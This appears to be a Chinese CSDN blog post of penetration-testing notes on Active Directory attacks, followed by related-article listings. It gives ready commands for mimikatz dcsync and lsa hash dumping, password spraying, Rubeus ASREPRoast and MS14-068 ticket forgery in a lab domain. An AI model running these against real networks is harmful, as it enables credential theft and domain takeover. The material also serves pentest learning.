内网常见域内攻击

最新推荐文章于 2024-07-27 16:06:00 发布
最新推荐文章于 2024-07-27 16:06:00 发布
阅读量1.2k 收藏 4
点赞数 1
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43271194/article/details/110393670
版权

域内攻击

kerberos攻击

利用黄金票据+dcsync获取密码

  • 先获取黄金票据
    在这里插入图片描述

  • 获取密码

    lsadump::dcsync /user:用户 /domain:域名称

    成功

    在这里插入图片描述

域用户、密码枚举

工具

用户枚举

  • 先导入

    Import-Module .\DomainPasswordSpray.ps1

  • 然后执行

    Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt

    结果

在这里插入图片描述

查看userlist

在这里插入图片描述

密码喷射

  • 执行

    Invoke-DomainPasswordSpray -Domain domainname -Password Passw0rd@ -OutFile pass.txt

    即使用Passw0rd@和域内用户密码进行对比,成功则返回(有点鸡肋)

ASREPRoast

ASREPRoast攻击寻找不需要Kerberos域身份验证的用户。这意味着任何人都可以代表这些用户中的任何一个向KDC发送AS_ REQ请求,并接收AS REP消息。最后一种消息包含用原始用户密钥加密的数据块,该原始用户密钥从其密码派生而来。然后,通过使用此消息,用户密码可以离线破解。

工具

使用

  • 获取hash

    Rubeus.exe asreproast /format:john /outfile: hashes.txt

    这条命令会将提取到的hash值存储到一个txt文件中,存储格式是John这款工具可以破解的格式

  • 然后可以使用john来破解

域内提权

MS14-068

利用前提

  • 未打补丁(KB3011780)
  • 一台域内机器
  • 有它的sid和密码

工具

使用

  • 生成伪造证书

    MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>

演示

  • 获取sid

    whoami /user

在这里插入图片描述

  • mimikatz抓取域密码

    不知道就抓

  • 生成伪造kerberos证书

    MS14-068.exe -u win2008@test.local -p user2008. -s S-1-5-21-1031516656-1656020465-3194443236-1140 -d 192.168.95.10

在这里插入图片描述

  • 使用mimikatz加载

    kerberos::ptc xxx.ccache

    注入成功

在这里插入图片描述

提升至域管理员用户

2012复现不成功,但是在08比较有效

在这里插入图片描述

域hash抓取

假设已经拿到了域管理员的权限

工具mimikatz

数据可能比较多所以先用存一个log

log
在这里插入图片描述

在这里插入图片描述

然后

lsadump::dcsync /domain:<domainname> /all /csv

在这里插入图片描述

不知道为什么会缺少参数,也可以使用下面这个

lsadump::lsa /inject

在这里插入图片描述

也可以使用msf的domain_hashdump模块

Amire0x
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内用户枚举和密码喷洒攻击(Password Spraying)
谢公子的博客
04-28 4194
目录 内用户枚举 密码喷洒攻击 在 Kerberos 协议认证的 AS-REQ阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对内进行用户枚举和密码喷洒攻击 内用户枚举 当主机不在内时,我们可以通过内用户枚举来探测内的用户。我们可以使用nmap指定脚本来探测。 nmap ...
攻击方法
wuxinweii的博客
11-30 3649
环境: 攻击方法:伪造信任票据 一、获取子和父的SID 以及信任密钥 mimikaze中有此功能 在mimikaze输入:lsadump::trust /patch 指向分别为 林和子的SID以及双方的信任密钥 二、通过SID以及信任密钥伪造信任密钥 在mimikatz中输入: "kerberos::golden /domain:[当前所在] /sid:[当前的SID] /sids:[当前的sid-519] /rc4:[信任密钥 /user:[将权限赋予谁] /service:[需要访问
攻击手法——AS-REP Roasting攻击和Kerberoasting攻击
最新发布
Naive的博客
07-27 921
AS-REP Roasting是一种对用户账户进行离线爆破的攻击方式。但是该攻击方式使用上比较受限,因为其需要用户账户设置不要求Kerberos 预身份验证选项。Kerberoasting 攻击是在 TGS_REP 的过程中用户将会收到由目标服务实例的 NTLM hash 加密生成的 ST(service ticket),如果获得这个 ST 票据,由于该 ST 是用服务 Hash 进行加密的,因此客户端在拿到该 ST 后可以用于本地离线爆破。
内网攻击渗透学习(笔记)
p_utao的博客
11-27 1421
信息收集 有了内网的第一台机器的权限后,就到了很关键的一步信息收集,它也是内网渗透中不可或缺的一部分。 查看当前机器的网络环境,收集里的相关信息,包括所有的用户、所有的计算机,以及相关关键组的信息。 net user/domain:查看用户 net view/domain:查看有几个 net view/domain:xxx:查看内的主机 net group/domain:查看里面的组 net group "domain computers" /domain:查看内所有的主机名 net group
内委派攻击
01-31 443
委派是指,将内用户的权限委派给服务账号,使得服务账号能以用户权限开展内活动。利用委派可获取管理员权限 委派主要分为三种: 非约束性委派 约束性委派 基于资源的约束性委派 在Windows系统中,只有服务账号和主机账号的属性才有委派功能,普通用户默认是没有的。 01、非约束委派攻击 设置非约束委派 主机账号设置非约束委派: 活动目录中的computers组内的计算机,双...
网络安全——局内网攻击手段(MAC地址攻击、ARP攻击、DHCP攻击
热门推荐
永远是少年
06-24 1万+
网络安全一直是信息安全的重要内容,而局网安全又往往是网络安全的一个重要组成部分。局网内有哪些攻击攻击手段呢?今天主要介绍MAC地址攻击、ARP攻击、DHCP攻击攻击的原理。要看懂本文,需要有一定的局网内交换知识、DHCP原理等的理解。 一、MAC地址攻击 1、MAC地址洪范攻击 所谓MAC地址洪范攻击,就是攻击者向局网内发送大量伪造MAC地址的数据包,意图占满局网内交换机的MAC地址转发表。由于交换机MAC地址表往往都具有一定的空间限制,当MAC地址表被占满后,就无法学习到新的MAC地址,因此,
内网针对AD攻击方式和防护方法 - 聂君-外发.pdf
11-05
另外,Kerberoast攻击也是针对活动目录常见攻击手段,攻击者可以利用有效的用户身份验证票证(TGT)去请求目标服务的服务票证,并通过离线破解得到目标服务帐号的HASH。 针对活动目录的安全防护方案应包括以下几...
内网渗透之渗透.pdf
08-07
在准备对进行渗透测试时,首先要判断当前环境是否处于内,以及定位到控制器的具体位置。这包括检查本机的配置信息、利用DNS查询来确定控制器的IP地址、使用特定的命令和工具来收集网络上的活动目录信息等。...
关于渗透与免杀对抗思考及其常见方式
03-16
- **横向移动**:攻击者通过横向移动技术在同一个内的不同主机间移动,寻找更易攻破的目标或获取更高权限的账户。 - **WAF绕过**:Web应用防火墙(WAF)是一种保护Web应用程序不受攻击的安全措施。攻击者会尝试绕过...
内网安全攻防:渗透测试实战指南》读书笔记(七):跨攻击分析及防御
闵行小鱼塘
04-19 2851
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章是跨攻击分析及防御,对利用信任关系实现跨攻击的典型方法进行了分析,并对如何部署安全的内网生产环境给出了建议,内容非常简短
内横向渗透
不忘初心,护天下安全!
06-02 335
利用NTLM、Kerberos及SMB等协议。攻击者进入内网后会进行横向移动建立多个立足点,常见的技巧包括凭证窃取、横向移动、Pass The Hash(hash传递)、导出成员Hash、黄金白银票据、MS14-068等。窃取凭据来帮助在内横向移动,一旦获取的密码在内网中是通用的,将会方便横向移动获取目标权限。方法一:MimikatzMimikatz一款windows平台下的神器,它具备很多功能,其中最亮眼的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。读
警惕黑客使用的4种攻击无线局网手段.php
12-12
警惕黑客使用的4种攻击无线局网手段.php
内网攻击
m0_56937298的博客
06-23 2190
内网攻击
内网横向移动—ARP攻击&图片捕捉&数据劫持&DNS劫持
剁椒鱼头没剁椒的博客
08-12 1847
ARP(Address Resolution Protocol)是一种TCP/IP协议,用于根据IP地址获取物理地址。在计算机发送信息时,如果需要知道目标IP地址的物理地址,就会使用ARP协议。该协议会通过将目标IP地址广播到局网上的所有主机,并接收返回的消息来获取目标物理地址。一旦收到返回的消息,计算机就会将该IP地址和物理地址存入本机ARP缓存中,以便下次请求时直接查询,从而节约资源。
如何攻击控?
02-03 553
在Active Directory中获得管理员权限的攻击方法 https://adsecurity.org/?p=2362 Kerberos票证:理解和利用 https://www.tarlogic.com/en/blog/kerberos-tickets-comprehension-and-exploitation/ Kerberos(I):Kerberos如何工作?–理论 http...
常见内网攻击1
weixin_44024162的博客
03-15 3387
内网攻击 arp中间人攻击 原理 通过构造arp响应报文,导致目标计算机与网关通信失败,更会导致通信重定向,所有的数据都会通过攻击者的机器。攻击者再对目标和网关之间的数据进行转发,则可作为一个“中间人”,实现监听目标却又不影响目标正常上网的目的。 防御 arp防御 主机中手动建立arp表 主机中用arp防火墙固化arp表 交换机使用dai(动态arp检测技术) ICMP重定向防御 原理 当路由器收...
Windows攻击技术
weixin_33681778的博客
11-12 128
有关windows攻击的一些技术资料。 附件:http://down.51cto.com/data/2353804 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/195611 ...
攻击分析和防御(上)
Ms08067安全实验室
11-24 1284
点击星标,即时接收最新推文跨攻击在大型公司或大型跨国企业中都拥有自己的内网,跨国公司都有各个子公司一般以建立林进行共享资源。根据不同职能区分的部门,从逻辑上以主和子进行划分以方便统一管理。在物理层使用防火墙将各个子公司以及各个部门划分为不同区。我们在渗透测试过程中如果拿到其中某个子公司或是某个部门的控制器权限后,如果没有得到整个组织机构全部权限或我们需要寻找的资料不在此中,往往需要其...
常见攻击方式原理
渗透测试
05-21 5247
文章目录前言一、ARP欺骗1.查看arp表2.arp原理3.arp欺骗过程二、DNS欺骗三、DDos攻击总结 前言 简单介绍了常见的局攻击方式 一、ARP欺骗 局网不是根据ip地址,而是根据MAC地址进行传输。破坏MAC地址,会影响传输。例如,MAC地址在A上伪造一个不存在的MAC地址,A不能pingC,这就是简单的ARP欺骗。 1.查看arp表 kali使用arp查看,windows使用arp -a查看 ┌──(root????kali)-[~] └─# arp Address
内网结构探测:内信息收集关键步骤
本文主要探讨了内网中的信息收集策略,特别是关于内网结构探测的重要性。作者bugcx在其博客中分享了如何在入侵内网时进行初步的信息搜集工作,以便了解网络布局和寻找潜在漏洞。首先,通过对网络设备如子网掩码、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值